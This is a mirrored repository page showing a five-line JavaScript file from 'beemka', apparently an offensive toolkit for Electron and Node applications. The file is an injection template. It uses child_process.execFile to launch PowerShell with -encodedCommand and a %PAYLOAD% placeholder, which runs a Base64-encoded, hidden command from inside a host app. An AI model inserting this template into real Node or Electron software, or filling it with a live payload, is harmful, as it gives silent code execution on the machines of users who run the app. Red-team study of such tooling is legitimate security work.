mirror of
https://github.com/ctxis/beemka
synced 2026-06-08 13:38:25 +00:00
5 lines
155 B
JavaScript
5 lines
155 B
JavaScript
child = require('child_process').execFile
|
|
executablePath = "%POWERSHELL%"
|
|
child(executablePath, ['-encodedCommand', '%PAYLOAD%'], function(err, data) {
|
|
|
|
}) |